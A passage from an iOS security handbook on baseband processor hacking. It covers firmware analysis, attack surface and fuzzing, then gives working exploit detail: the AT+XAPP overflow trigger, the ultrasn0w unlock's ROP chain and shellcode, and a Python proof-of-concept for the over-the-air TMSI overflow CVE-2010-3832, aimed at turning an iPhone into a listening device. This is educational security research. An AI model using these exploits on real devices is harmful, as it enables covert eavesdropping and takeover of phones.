This means that before you can perform any meaningful analysis on the .fls files, you need to perform the same steps the startup code does. You have several ways to do this: the first is described in an IDA Pro tutorial and involves using the QEMU emulator to simply execute the startup sequence. The second way to get the firmware relocated to its in-memory layout is by using a script or a loader module. A universal scatter loading script written by roxfan has been circulating among iPhone hackers for a while. We have decided to write and release an IDA Pro module (flsloader) for iPhone baseband firmware that incorporates this functionality. You can download this code from the companion website of the book (www.wiley.com/go/ioshackershandbook). There you also find a script make_tasktable.py that automatically identifies the table of tasks that are created by, for instance, Application_Initialize() on Nucleus PLUS or tx_application_define() on ThreadX. This greatly enhances IDA Pro's auto-analysis.

Qualcomm's firmware files are in standard Executable and Linkable Format (ELF); you do not need a custom IDA Pro loader module to load them.

Application/Baseband Processor Interface

If you look closely at the connection between the baseband processor and the application processor, it becomes clear that talking to the AT command interpreter doesn't happen directly over a serial line, but rather that many things are multiplexed over either a serial line (Infineon-based chips) or over USB (Qualcomm). For the Infineon basebands, the multiplexing is done in a kernel extension com.apple.driver.AppleSerialMultiplexer according to 3GPP 27.007. For Qualcomm baseband processors, a Qualcomm proprietary protocol called Qualcomm MSM Interface (QMI) is used. Source code for an implementation of QMI exists in the Linux kernel fork for the MSM platform created by the CodeAurora Forum (https://www.codeaurora.org/contribute/projects/qkernel).

Stack Traces and Baseband Core Dumps

For analyzing vulnerabilities — and more importantly, for actually exploiting them — it is extremely useful to have some visibility of the state of the system at the time of the crash and, if possible, at run time.

For iOS devices with an Infineon baseband, you can use the AT+XLOG command to obtain a log of baseband crashes and their stack traces. Even better, on the X-Gold chips there's a way to trigger a core dump of the baseband memory without actually needing to exploit a bug first. To do this, you first need to enable the functionality, which you can do with a special dial string through the Phone dialer (this is parsed by CommCenter). By calling the number *5005*CORE#, you can enable the core dump functionality (#5005*2673# turns it off again and *#5005*2673# shows the status of the setting). Using minicom, you can send the AT command AT+XLOG=4 to the baseband to trigger an exception; this will cause the baseband memory to be dumped. This dump is segmented by memory region and will be stored in a directory of the form log-bb-yyyy-mm-dd-hh-mm-ss-cd in /var/wireless/Library/Logs/CrashReporter/Baseband:

# cd /var/wireless/Library/Logs/CrashReporter/Baseband
/log-bb-2012-01-17-11-36-07-cd
# ls -l
total 9544
-rw-r--r-- 1 _wireless _wireless   65544 Jan 17 11:36 0x00090000.cd
-rw-r--r-- 1 _wireless _wireless   16760 Jan 17 11:39 0x40041000.cd
-rw-r--r-- 1 _wireless _wireless  262152 Jan 17 11:40 0x40ac0000.cd
-rw-r--r-- 1 _wireless _wireless  262152 Jan 17 11:40 0x40b00000.cd
-rw-r--r-- 1 _wireless _wireless  539372 Jan 17 11:36 0x60700000.cd
-rw-r--r-- 1 _wireless _wireless 8564860 Jan 17 11:39 0x60784ae4.cd
-rw-r--r-- 1 _wireless _wireless   16392 Jan 17 11:36 0xffff0000.cd

If you have done everything correctly, you will see a message stating Baseband Core Dump in Progress on the screen of your iPhone for a number of seconds.

Attack Surface

This section evaluates the attack surface that the baseband processor provides. For local exploits, functions exposed through the AT command interpreter were attacked in soft unlocks, but this is by no means the only way to perform a local attack. Another vector that has been used successfully in the past, in an exploit called JerrySIM, was the interface between the SIM and the baseband processor. Considerable complexity is hidden in this interface, especially given the fact that SIM Application Toolkit (STK) and USIM Application Toolkit (USAT) messages from the SIM need to be parsed and processed. For Qualcomm basebands, the USB stack might be a viable target for local attacks as well. According to mailing list posts on the linux-arm-msm mailing list, it seems that Qualcomm is using a ChipIdea core with the corresponding stack. Interestingly, the baseband firmware for the X-Gold 61x chipset also includes a USB stack; however it does not seem to be accessible from the application processor.

Note
A soft unlock is a nonpermanent modification of the cellular stack that needs to be reapplied every time the baseband processor is restarted, usually by injecting a task. This is in contrast to the earlier unlocks — which could be called hard unlocks — that permanently altered the baseband firmware stored in flash memory.

When mapping the attack surface of the cellular stack exposed over the air interface, you start at the lowest layer. Decoders of audio data are a frequent source of memory corruption bugs, even in the domain of GSM stacks. Look carefully and you will be able to find examples of voice codecs that send length fields over the air, which may or may not be trusted by the cellular stack in question. However, the downside of such bugs is that they need an established voice connection as a precondition. Up in the data link layer memory corrupting bugs are possible at this layer as well, however frames are too short (17 bytes) to make exploits easy.

Arriving at the network layer you are overwhelmed by a Smörgåsbord of opportunities. To understand, you have to look at 3GPP 24.008 — this 3GPP specification supersedes GSM specification 04.08 — to see how messages on layer 3 are encoded: Messages can be up to 253 bytes long and encoded in different ways. The designers of this fine standard were apparently influenced by ASN.1: They allow variable-length fields for a wide variety of protocol messages. In a number of cases even entities that are explicitly stated to be of fixed length are encoded in a format that transmits their length over the air, creating ambiguity for the parser. However, this is not the only fruitful area; going even higher in the sublayers of layer 3 you find plenty of opportunities to corrupt memory in implementations in the handling of supplementary data and the parsing of short messages. Last but not least, spatial memory corruptions are not the only kind cellular stacks allow. Rather, the fact that many parts of the GSM stack are driven by explicit, large, and complicated state machines gives implementers a more than sufficient chance of introducing temporal memory corruptions such as use-after-frees into their codebase as well, especially considering the fact that allocations and deallocations of some data structures in these state machines are not necessarily done by the same task.

Note
For an example of large and complicated state machines, refer to Figure 4.1 (Overview mobility management protocol/MS Side in 3GPP24.008.)

However, identifying and reproducing temporal memory corruptions without source code or instrumentation for the cellular stack is a hard problem.

Static Analysis on Binary Code Like it's 1999

Because of the number of functions in the IDA Pro databases of the baseband firmware, performing even a shallow audit of the codebase for memory corruptions will be a humongous task.

A straightforward way to find potential memory corruptions in baseband stacks is by looking for functions that perform memory block transfers such as memcpy(), memmove(), and friends, and investigate which of these functions an attacker can use to obtain sufficient control over the length and/or the destination of the transfer. This task is aided by the fact that assertions are placed all over the codebase that log the filename and the line number (in some cases a message and a result code is included as well) whenever situations crop up that were not expected; these strings are even present in the production versions of the baseband firmware.

Note
More advanced ways exist to find memory writes that can lead to potential memory corruptions, for instance by loop detection using dominator trees. For more information see Halvar Flake's slide deck “More fun with Graphs” from Blackhat Federal 2003 and Pete Silberman's article on loop detection in the first volume of the Uninformed journal.

This way of auditing was very successful on a number of stacks; however, the vast number of memory copies in the IFX stack transfers constant-length blocks.

Specification-Guided Fuzz Testing

A different approach to finding potential memory corruptions is to read the GSM and 3GPP specifications carefully and take note of all messages transmitted that have variable-length elements. For each of these messages, you can then try sending such a message with one or more elements having a length not supported by the specification (this may be larger than the allowed maximum or smaller than a minimum specified) and observing whether a crash is triggered on the device. A number of problems exist with this approach, however. First, although it is easy to fuzz test messages that operate in a “stateless” fashion, such as functions related to Mobility Management, things become trickier if you try to find bugs in the Call Control sublayer, for example. Here certain messages are available only for established calls. Second, you will need to have a fairly complete understanding of the protocol you are trying to fuzz. With GSM this is difficult, as the protocol is distributed across thousands of standard documents, and you might easily miss the relevance of some of them. In fact, as there are several revisions of most standards, you might even miss something if you're not aware of all revisions as you do not know a priori which revision of the GSM standard a certain stack conforms to. Last but not least you will deal with a large number of crashes that turn out to be non-exploitable and it will take you a long time to understand which of your crashes are. In general, meaningful fuzz testing is hard to perform with cellular stacks because the specifications are full of explicitly specified state machines that make many code paths hard to reach.

However, note that the bug — described later in this chapter, CVE-2010-3832 — indeed was found by a procedure that could be called “specification-guided fuzz testing.”

Exploiting the Baseband

This section examines two examples of memory corruption vulnerabilities that can be used to take control over the baseband. The first one is a local vulnerability that can be exploited through the AT command interpreter. The second one is a vulnerability that can be used with an over-the-air interface to attack vulnerable iPhones remotely by having a rogue base station in its proximity.

A Local Stack Buffer Overflow: AT+XAPP

The AT+XAPP vulnerability is a classic stack buffer overflow that has been used as one of the injection vectors by the ultrasn0w unlock. It is present in all S-Gold 2 basebands, the X-Gold 608 basebands up to versions 05.13.04 (iPhone 3/3GS) and 06.15.00 (iPad), as well as in the X-Gold 61x baseband in version 01.59.00. The vulnerability was independently discovered by @sherif_hashim, @Oranav, @westbaer, and geohot by testing AT commands for crashes.

Having an easily exploitable local memory corruption is a very useful step before investigating remote vulnerabilities. The following example shows the effect of the PoC trigger on an iPhone 2G running the ICE baseband version 04.05.04_G:

# ./sendmodem ‘AT+XAPP="####################################4444555566667777
PPPP"’
Sending command to modem: AT
------.+
AT
OK
Sending command to modem:
AT+XAPP="####################################4444555566667777PPPP"
-.+
# ./sendmodem ‘AT+XLOG’
Sending command to modem: AT
-.+
AT
OK
Sending command to modem: AT+XLOG
-........+
AT+XLOG
+XGENDATA: "DEV_ICE_MODEM_04.05.04_G    
"

+XLOG: Exception Number: 1
Trap Class: 0xBBBB (HW PREFETCH ABORT TRAP)
System Stack:
            0xA0086800
            [176 DWORDs omitted]
            0x00000000

Date: 15.01.2012
Time: 05:47
Register:
r0:   0x00000000   r1:   0x00000000 r2:   0xFFFF231C
r3:   0xB0101FF9   r4:   0x34343434 r5:   0x35353535
r6:   0x36363636   r7:   0x37373737 r8:   0x00000000
r9:   0xA00028E4   r10:  0xB00AC938 r11:  0xB00B67CC
r12:  0xA0114F95   r13:  0xB00B2CF4 r14:  0xA010E97D
r15:  0x50505054
SPSR: 0x40000013  DFAR:  0x00000001 DFSR: 0x00000005

OK
#
Note
This example uses sendmodem from http://code.google.com/p/iphone-elite/wiki/sendmodem to communicate with the baseband. If you want to interface with the AT command parser on the iPhone 4 GSM, use /dev/dlci.spi-baseband.extra_0 instead of /dev/tty.debug.

As you can see, this overflow can be used to set registers r4–r7 as well as the program counter. You can easily use this overflow to inject your own code into the baseband.

The ultrasn0w Unlock

Here you investigate how the AT+XAPP overflow was used by the ultrasn0w unlock to circumvent the network lock on the iPhone 4.

First you have to understand the logistics of the ultrasn0w package. This unlock works by injecting a dynamic library into the CommCenter process using the MobileSubstrate framework. This dynamic library — after checking that it is talking to a supported version of the baseband software — sends a sequence of AT commands to the baseband processor that exploits the AT+XAPP overflow and places a sequence of payloads there. The final goal is to intercept and change messages sent and received by the so-called SEC thread (func_sec_process) to fake an unlocked state to the rest of the cellular stack communicating. In previous versions of ultrasn0w for the X-Gold 608 chipset, this was achieved by creating a separate Nucleus task that intercepted mailbox messages and replaced them. In the ultrasn0w version for the iPhone 4, a different route is taken: The unlock overwrites parts of ThreadX that are responsible for the interthread communication of the SEC thread. This section covers the tricks used to achieve this; the latest version of ultrasn0w for the iPhone4 is by far the most elaborate unlock in existence, bordering on art.

If you disassemble the dynamic object ultrasn0w.dylib located in /Library/MobileSubstrate/DynamicLibraries on your iPhone after the installation of ultrasn0w, you find an array of pointers to strings called unlock_strings that points to four different instantiations of the at+xapp overflow exploited on the baseband processor. Dissecting these allows you to unravel the unlock and appreciate its level of sophistication.

Here is the initial code injection. Already in the first unlock string sent, you might notice something unexpected; instead of code being injected directly, a ROP chain comprised of a single gadget (0x6014A0F1) is used to stitch together a piece of code at the very high end of memory:

0x00000000            DCD 0x34343434      ; R4 [unused]
0x00000004            DCD 0x35353535      ; R5 [unused]
0x00000008            DCD 0x36363636      ; R6 [unused]
0x0000000C            DCD 0x37373737      ; R7 [unused]
0x00000010            DCD 0x6014A0F3      ; POP {R3-R5}, PC
0x00000014            DCD ‘UUUU’          ; R3 [unused]
0x00000018            DCD 0x47804807      ; R4 [code/data]
0x0000001C            DCD 0xFFFF1FD0      ; R5 [address]
0x00000020            DCD 0x6014A0F1      ; STR R4, [R5]
0x00000020                                ; POP {R3-R5}, PC
0x00000024            DCD ‘UUUU’          ; R3 [unused]
0x00000028            DCD 0xBC0F1C07      ; R4 [code/data]
0x0000002C            DCD 0xFFFF1FD4      ; R5 [address]
0x00000030            DCD 0x6014A0F1      ; STR R4, [R5]
0x00000030                                ; POP {R3-R5}, PC
[...]
0x000000B4            DCD ‘UUUU           ; R3 [unused]
0x000000B8            DCD 0x601FD9FC      ; R4 [code/data]
0x000000BC            DCD 0xFFFF1FF8      ; R5 [address]
0x000000C0            DCD 0x6014A0F1      ; STR R4, [R5]
0x000000C0                                ; POP {R3-R5}, PC
0x000000C4            DCD ‘3333’          ; R3 [unused]
0x000000C8            DCD ‘4444’          ; R4 [unused]
0x000000CC            DCD ‘5555’          ; R5 [unused]
0x000000D0            DCD 0xFFFF1FD1      ; entry point
0x000000D4            DCD 0xFFFF04D0      ; [2nd stage] R0 (memcpy dst)
0x000000D8            DCD 0x6087A7BC      ; [2nd stage] R1 (memcpy src)
0x000000DC            DCD 0x1010159       ; [2nd stage] R2 (1st summand of len)
0x000000E0            DCD 0xFEFEFEFF      ; [2nd stage] R3 (2nd summand of len)

Each call of the ROP gadget consumes four arguments from the stack that are placed into registers r3-r5 and PC. After 11 words have been written, the execution flow is redirected to the Thumb code created. Following is the disassembly:

0xFFFF1FD0                         CODE16
0xFFFF1FD0 07   48                 LDR             R0, =0x6018135C
0xFFFF1FD2 80   47                 BLX             R0     ; call disable_ints
0xFFFF1FD4 07   1C                 MOVS            R7, R0
 ; preserve CPSR
0xFFFF1FD6 0F   BC                 POP             {R0-R3}; get args for memcpy
0xFFFF1FD8 D2   18                 ADDS            R2, R2, R3 ; fix up length
0xFFFF1FDA 07   4B                 LDR             R3, =0x601FD9FC
0xFFFF1FDC 98   47                 BLX             R3; call memcpy
0xFFFF1FDE 38   1C                 MOVS            R0, R7; get preserved CPSR
0xFFFF1FE0 04   49                 LDR             R1, =0x6018136C
0xFFFF1FE2 88   47                 BLX             R1 ; call restore_cpsr
0xFFFF1FE4 01   49                 LDR             R1, =0x72883C6C ; for clean…
0xFFFF1FE6 8D   46                 MOV             SP, R1; continuation
0xFFFF1FE8 48   1A                 SUBS            R0, R1, R1; clear R0
0xFFFF1FEA F0   BD                 POP             {R4-R7,PC} ; no crash, please
0xFFFF1FEA               ; ---------------------------------------
0xFFFF1FEC 6C   3C 88 72 new_sp          DCD 0x72883C6C; DATA XREF: 0xFFFF1FE4
0xFFFF1FF0 5C   13 18 60 P_disable_ints  DCD 0x6018135C; DATA XREF: 0xFFFF1FD0
0xFFFF1FF4 6C   13 18 60 P_restore_cpsr  DCD 0x6018136C; DATA XREF: 0xFFFF1FE0
0xFFFF1FF8 FC   D9 1F 60 P_memcpy        DCD 0x601FD9FC; DATA XREF: 0xFFFF1FDA

This code is a stager routine that copies the code from the remaining unlock string to another area at the top end of the memory. The code in question lives at 0xFFFF04D0 and disassembles as follows:

0xFFFF04D0 detour_0xFFFF04D0                           ; detour to ROM
0xFFFF04D0                   LDR             PC, =0x40736334
0xFFFF04D0 ; --------------------------------------------------
0xFFFF04D4                   CODE16
0xFFFF04D4 org_0xFFFF04D0    DCD 0x40736334  ; DATA XREF: detour_0xFFFF04D0
0xFFFF04D8 ; -----------------------------------------------
0xFFFF04D8
0xFFFF04D8 decoder_entry
0xFFFF04D8                   LDR             R0, =0x60FA011F
0xFFFF04DA                   SUBS            R0, #0x80       ; avoid 0 bytes
0xFFFF04DC                   SUBS            R0, #0x80       ; R0 = 0x60FA001F
0xFFFF04DE                   LDR             R2, =0x60701280
0xFFFF04E0                   STR             R0, [R2]
0xFFFF04E2                   ADDS            R4, R4, R7
0xFFFF04E4                   LDR             R0, =0x6018135C
0xFFFF04E6                   BLX             R0            ; call disable_ints
0xFFFF04E8                   MOVS            R7, R0
0xFFFF04EA                   ADDS            R2, R5, R6
0xFFFF04EC                   MOVS            R5, 0x22 ; ‘"’
0xFFFF04F0
0xFFFF04F0 decoder_loop                      ; CODE XREF: 0xFFFF0508
0xFFFF04F0                   LDRB            R0, [R4]
0xFFFF04F2                   CMP             R0, R5    ; check for end of str
0xFFFF04F4                   BEQ             break_loop
0xFFFF04F6                   NOP
0xFFFF04F8                   CMP             R0, #0xFF ; escape character
0xFFFF04FA                   BNE             non_escaped
0xFFFF04FC                   ADDS            R4, #1    ; skip 0xFF
0xFFFF04FE                   LDRB            R0, [R4]
0xFFFF0500                   ADDS            R0, #1
0xFFFF0502
0xFFFF0502 non_escaped                       ; CODE XREF: 0xFFFF04FA
0xFFFF0502                   STRB            R0, [R2]
0xFFFF0504                   ADDS            R4, #1
0xFFFF0506                   ADDS            R2, #1
0xFFFF0508                   B               decoder_loop
0xFFFF050A ; ------------------------------------------------------
0xFFFF050A
0xFFFF050A break_loop                                  ; CODE XREF: 0xFFFF04F4
0xFFFF050A                   MOVS            R0, R7
0xFFFF050C                   LDR             R1, =0x6018136C
0xFFFF050E                   BLX             R1        ; call restore_cpsr
0xFFFF0510                   SUBS            R0, R1, R1
0xFFFF0512                   MOV             R2, SP
0xFFFF0514                   LDR             R2, [R2]
0xFFFF0516                   BX              R2
0xFFFF0516 ; -------------------------------------------------------------------
0xFFFF0518 dword_FFFF0518  DCD 0x60FA011F            ; DATA XREF: decoder_entry
0xFFFF051C dword_FFFF051C  DCD 0x60701280            ; DATA XREF: 0xFFFF04DE
0xFFFF0520 P_disable_ints  DCD 0x6018135C            ; DATA XREF: 0xFFFF04E4
0xFFFF0524 P_restore_cpsr  DCD 0x6018136C            ; DATA XREF: 0xFFFF050C

Since there was a routine of the ThreadX OS living at the address overwritten by the previous code, the first instruction is a simple detour to a version of the overwritten function in flash. The code starting at 0xFFFF04D8 is a simple decoding function that is used by subsequent at+xapp overflow instantiations to allow for arbitrary payloads; this simple decoder is required if you want to inject binary blobs, as certain bytes such as whitespaces and the zero byte are not allowed to appear in the string passed to at+xapp. The decoder uses r5+r6 as a destination address for the decoded payload and r4+r7 as the source address for the input of the decoder. It works by copying bytes until it hits a quotes character (0x22), regarding 0xff as an escape symbol. If 0xff is found in the input, the byte following it is incremented by one (modulo 256) and copied to the output — with the escape symbol discarded.

This approach raises two questions: Why is a ROP chain needed to inject the decoder and what is so special about the memory space the stager and the decoder were copied to?

The X-Gold 61x introduced a new security feature, namely a strict form of Data Execution Prevention (DEP). All memory regions that are writable lack the execute flag. Furthermore, memory is marked as executable in the early initialization phase, and after this phase the page permissions are locked. There seems to be no way to ever set an execute flag on a writable page after this initialization phase is completed.

On the other hand, you can see native rather than just ROP chains code in the preceding payload. How does that work? It turns out that the DEP armor has a significant chink. ARM CPUs can have first level caches, which are called tightly coupled memory (TCM). The ARM1176 core in the X-Gold 61x has a TCM that it is enabled during initialization:

0x40100054     MOV    R0, #0  ; TCM bank 0
0x40100058     MCR    p15, 0, R0,c9,c2, 0 ; write TCM selection register
0x4010005C     NOP
0x40100060     MOV    R0, #1  ; "1 = I/D TCM Region Register accessible in
                              ; Secure and Non-secure worlds."
0x40100064     MCR    p15, 0, R0,c9,c1, 2 ; write DTCM non-secure control access
                                          ; register
0x40100068     NOP
0x4010006C     MCR    p15, 0, R0,c9,c1, 3 ; write ITCM non-secure control access
                                          ; register
0x40100070     NOP
0x40100074     LDR    R1, =0xFFFF000D ; enable ITCM with base address 0xFFFF0000
0x40100078     MCR    p15, 0, R1,c9,c1, 1 ; write ITCM region register
0x4010007C     NOP
0x40100080     LDR    R1, =0xFFFF200D ; enable DTCM with base address 0xFFFF2000
0x40100084     MCR    p15, 0, R1,c9,c1, 0 ; write DTCM region register
0x40100088     NOP
0x40100088 ==========================
0x4010008C     MOV    R0, #1  ; TCM bank 1
0x40100090     MCR    p15, 0, R0,c9,c2, 0 ; write TCM selection register
0x40100094     NOP
0x40100098     MOV    R0, #1  ; "1 = I/D TCM Region Register accessible in
                              ;  Secure and Non-secure worlds."
0x4010009C     MCR    p15, 0, R0,c9,c1, 2 ; write DTCM non-secure control access
 register
0x401000A0     NOP
0x401000A4     MCR    p15, 0, R0,c9,c1, 3 ; write ITCM non-secure control access
 register
0x401000A8     NOP
0x401000AC     LDR    R1, =0xFFFF100D
0x401000B0     MCR    p15, 0, R1,c9,c1, 1 ; write ITCM region register
0x401000B4     NOP
0x401000B8     LDR    R1, =0xFFFF300D
0x401000BC     MCR    p15, 0, R1,c9,c1, 0 ; write DTCM region register
0x401000C0     NOP
0x401000C4     BX     LR

This explains why the exploit could write to addresses above 0xFFFF0000 and have the CPU execute the written data as code.

To make sense of the second and third at+xapp strings being sent, you first have to understand the last one. We will not give the payload contained in the last unlock string in its entirety, but rather only have a quick look at the meat of it:

0xFFFF0A30            LDR          R4, =0x601FD9FC ; memcpy
0xFFFF0A32            LDR          R5, =0x60FA0000 ; void *ptr = 0x60FA0000
0xFFFF0A34            LDR          R6, =0xFFFF1000
0xFFFF0A36
0xFFFF0A36 tcm_patch_loop                  ; CODE XREF: sub_FFFF09A8+A2
0xFFFF0A36            LDRH         R0, [R5] ; dst_offset = *((uint16_t *) ptr)
0xFFFF0A38            LDRH         R2, [R5,#2] ; len = *((uint16_t *) ptr + 2)
0xFFFF0A3A            MOVS         R7, R2
0xFFFF0A3C            CMP          R2, #0  ; if (len == 0)
0xFFFF0A3E            BEQ          tcm_pl_exit ; { goto tcm_pl_exit; }
0xFFFF0A40            ADDS         R5, #4  ; ptr += 4
0xFFFF0A42            MOVS         R1, R5
0xFFFF0A44            ADDS         R0, R0, R6 ; dst = 0xFFFF1000 + dst_offset
0xFFFF0A46            BLX          R4      ; memcpy(0xFFFF1000 + dst_offset,
                                          ; ptr, len)
0xFFFF0A48            ADDS         R5, R5, R7 ; ptr += len
0xFFFF0A4A            B            tcm_patch_loop
0xFFFF0A4C ; --------------------------------------------------------
0xFFFF0A4C
0xFFFF0A4C tcm_pl_exit                     ; CODE XREF: sub_FFFF09A8+96
0xFFFF0A4C            LDR          R0, =0xFFFF0F78
0xFFFF0A4E            ADR          R1, sub_FFFF0B54
0xFFFF0A50            MOVS         R2, #0xC
0xFFFF0A52            BLX          R4
0xFFFF0A54            BL           sub_FFFF0A74
0xFFFF0A58            POP          {R4-R7}
0xFFFF0A5A            MOVS         R0, #0
0xFFFF0A5C            LDR          R3, =0x60186E5D ; stack_cleanup (SP+=0x1C)
0xFFFF0A5E            BX           R3

The second and third at+xapp strings store a list of memory regions in the TCM to patch in memory at address 0x60FA0000. This list is traversed by the previous code and has a simple format: Each entry of the list has a header consisting of a 16-bit offset field relative to 0xFFFF1000 and a 16-bit length field specifying its length without header. The list is terminated with an entry that has zero in the length field. The following IDAPython script emulates the behavior of the previous native code.

from idc import *

ea = 0x60FA0000
dst = 0xFFFF1000
while True:
    n = Word(ea+2)
    offset = Word(ea)
    if n == 0:
        break
    print "patching %d bytes at 0x%08x." % (n, dst + offset)
    ea += 4
    for i in range(n):
        PatchByte(dst+offset+i, Byte(ea+i))
        SetColor(dst+offset+i, CIC_ITEM, 0xFFFF00)
    ea += n

Use the Load Additional Binary File function to load the decoded, concatenated payload of unlock strings two and three to address 0x60FA0000 into an existing IDA Pro database of the stack, then run the preceding script.

Another interesting facet of the payload contained in the last unlock string are the following two functions, for which we give their C representations:

/* 0xFFFF0AB2 */
int replace_addrs_on_stack(uint32_t *start, uint32_t *end, uint32_t match20msb,
                           uint32_t replace_base)
{
  while ( start < end )
  {
    /* this remaps every address pointing to the TCM region on the stack to
       its flash equivalent. forreal. whoaaa */
    if ( *start >> 12 == match20msb >> 12 )
      *start = (*start & 0xFFF) + replace_base;
    ++start;
  }
}

/* 0xFFFF07AE */
void replace_addrs_on_all_stacks(void *match20msb, void *replace_base) {
    thread_ptr = tx_thread_created_ptr; /* [R4] */

    /* i is stored in [SP]
     * tx_thread_created_count is in R7
     * thread_ptr is in R4
     */
    for(i = 0; i < tx_thread_created_count; i++) {
          replace_addrs_on_stack(thread_ptr->tx_thread_stack_start,
                               thread_ptr->tx_thread_stack_end,
                               match20msb, replace_base)
          thread_ptr = thread_ptr->next;
    }
}

The replace_addrs_on_all_stacks function is used to correct the addresses of all return addresses on the stacks of all threads. Every return address pointing into the TCM is rewritten to an address in flash memory; these are the memory locations from which the code copied by the scatter-loader into the TCM originates.

The lessons you learned from ultrasn0w will be of great advantage if you choose to develop a remote exploit for the iPhone4.

An Overflow Exploitable Over the Air

This section analyzes the CVE-2010-3832 vulnerability and gives a proof-of-concept exploit for it. This vulnerability results from a memory corruption of a buffer due to a missing boundary check on the length of the TMSI in LOCATION UPDATING REQUESTs and TMSI REALLOCATION COMMANDs — functionalities related to Mobility Management. It affects all iOS devices' cellular service running versions prior to iOS 4.2. No interaction with the device is required from the user; the device simply has to come into the range of a malicious base station wishing to exploit this vulnerability.

Here we show you how to trigger this vulnerability and how to leverage the heap corruption to gain control over the program counter. We then show you how to turn on the auto-answer functionality of the iPhone by executing the handler for setting the S0 register. This allows an attacker to turn an iPhone into a remote listening device.

We investigate this bug on an iPhone 2G running iOS 3.1.3 with baseband firmware ICE 04.05.04_G. The description here is the story that was recovered from scattered notes on how the bug was originally found and exploited, modulo some boring dead ends that were removed. We have chosen the iPhone 2G over the more recent iPhone 4 for two reasons: First, because the codebase of the iPhone 2G is much smaller and hence a clean IDB can be obtained much more quickly than for the iPhone 4. Second, for the iPhone 4, this bug has been patched and no known ways exist to downgrade the baseband firmware to a vulnerable version. Contrast this to the case of the iPhone 2G where firmware is completely malleable due to implementation failures in the security checks performed by the bootloader. This means that you can buy any old second-hand iPhone 2G and get your hands dirty in baseband hacking with a publicly known vulnerability; no fear that you've bought a version with the wrong baseband firmware revision, and no lost time and money due to accidental upgrades.

A TMSI REALLOCATION COMMAND with the length of the TMSI extended to 64 bytes neatly triggers the bug. Figure 11.3 shows a GSM layer 3 message containing a TMSI REALLOCATION COMMAND that triggers the bug, displayed via the Wireshark network analyzer.

Note
TMSIs smaller than 64 bytes do not cause a crash, at least on the iPhone 2G.

Figure 11.3 Malicious TMSI REALLOCATION COMMAND dissected with Wireshark

11.3

Unfortunately, the message cannot be directly created with an unmodified version of libmich. As with standards-compliant implementations of the GSM and 3GPP protocols there is no reason to support TMSIs have a length different from four bytes. However, you can easily use libmich to create an appropriate message and modify the TMSI field and length.

First start up OpenBTS, register the iPhone with your network, and initiate a UDP channel for exchanging GSM layer 3 packets with the handset by using the testcall facility of OpenBTS:

OpenBTS> tmsis
TMSI       IMSI            IMEI(SV)           age  used
0x4f5e0ccc 262XXXXXXXXXXXX 01XXXXXXXXXXXXXX  293s  293s

1 TMSIs in table
OpenBTS> testcall 262XXXXXXXXXXXX 60

OpenBTS> calls
1804289383 TI=(1,0) IMSI=262XXXXXXXXXXXX Test from=0 Q.931State=active SIPState=
Null (2 sec)

1 transactions in table

You then send this payload using the following small Python script:

#!/usr/bin/python

import socket
import time
import binascii
from libmich.formats import *

TESTCALL_PORT = 28670

len = 19
lai = 42
hexstr = "051a00f110"
hexstr += "%02x%02x%02xfc" % (lai>>8, lai&255, (4*len+1))
hexstr += ‘’.join(‘%02x666666’ % (4*i) for i in range(len))

print "layer3 message to be sent:", hexstr
l3msg = binascii.unhexlify(hexstr)
print "libmich interprets this as: ", repr(L3Mobile.parse_L3(l3msg))

tcsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tcsock.settimeout(1)
try:
    tcsock.sendto(l3msg, (‘127.0.0.1’, TESTCALL_PORT))
    reply = tcsock.recv(1024)
    print "reply received: ", repr(L3Mobile.parse_L3(reply))
except socket.timeout:
    print "no reply received. potential crash?"

Shortly after executing that script, you lose your signal (the baseband processor resets). The result is a crash log similar to the following on the iPhone, which you can extract using AT+XLOG:

+XLOG: Exception Number: 1
Trap Class: 0xAAAA (HW DATAABORT TRAP)
System Stack:
            0x6666661C
            0x66666630
            0x66666644
            0xA027CBFC
            0xA027CCE4
            0x6666665C
            0x0000000A
            0x6666665C
            [...]

Date: 14.07.2010
Time: 04:58
Register:
r0:   0xA027CBFC   r1:   0xA027CCE4 r2:   0x6666665C
r3:   0x0000000A   r4:   0x6666665C r5:   0xA027CCE4
r6:   0x00000001   r7:   0xB0016AA4 r8:   0x00000000
r9:   0xA00028E4   r10:  0xB008E730 r11:  0xB008FE9C
r12:  0x45564E54   r13:  0xB008FA8C r14:  0xA0072443
r15:  0xA0026818
SPSR: 0xA0000033  DFAR:  0x6666666C DFSR: 0x00000005

Take a peek at the code producing the preceding exception:

ROM:A002680A FF B5               PUSH    {R0-R7,LR}
ROM:A002680C 0D 00               MOVS    R5, R1
ROM:A002680E 83 B0               SUB     SP, SP, #0xC
ROM:A0026810 10 69               LDR     R0, [R2,#0x10]
        ; causes HW DATAABORT TRAP
ROM:A0026812 14 00               MOVS    R4, R2
ROM:A0026814 0D 9A               LDR     R2, [SP,#0x30+arg_4]
ROM:A0026816 0C 99               LDR     R1, [SP,#0x30+arg_0]
ROM:A0026818 FF F7 6D FB         BL      sub_A0025EF6
ROM:A002681C A0 69               LDR     R0, [R4,#0x18]
ROM:A002681E 26 00               MOVS    R6, R4

This code is at the beginning of a function called recv_signal() — not the official name, but our choice — that is called from more than 40 tasks and is used for inter-task communication; it receives signals from other tasks. In this case, the link register (r14) was directly called from the main function of the mme:1 task. Moreover, by looking at the pool allocations in the Application_Initialize() routine, you can deduce that the partition allocated was from a pool handing out chunks of 52 bytes.

Despite the crash log showing the program counter (r15) to be 0xA0026818, you can deduce from the Data Fault Address Register (DFAR) and the dump of the other registers that the instruction that caused the fault was the register load from memory at 0xA0026810. Great! This means you can have control over the first argument that is passed to the function sub_A0025EF6(ptr). Disassembling this function shows that this is a mere wrapper around NU_Deallocate_Partition(ptr) that first checks whether ptr == NULL. In case of a NULL pointer it logs an error, otherwise it simply calls NU_Deallocate_Partition(ptr). Looking closer at the implementation of partition memory, you can see that going this route will not be an easy one. In contrast to the dynamic memory implementation, partition memory does not give you an easy write4 primitive because there is no need for coalesced blocks. Other ways exist to exploit control over some of the registers in this scenario, but they are all long-winded and painful.

A simpler way to achieve your goal is to demand control over the program counter! It turns out there is an easy way to achieve that. By increasing the length of the TMSIs by four, and hence the number of overwritten words by one in each try, you quickly arrive at the case of 19 overwritten words:

+XLOG: Exception Number: 1
Trap Class: 0xBBBB (HW PREFETCH ABORT TRAP)
System Stack:
            0xA006FCA4
            0x00000677
            0x00000000
            0x0000000A
            0x00000000
            0x00000000
            0xB000E720
            0xB000E788
Date: 17.07.2010
Time: 21:31
Register:
r0:   0x00000000   r1:   0x60000013 r2:   0xFFFF231C
r3:   0x00000000   r4:   0x6666665C r5:   0x66666660
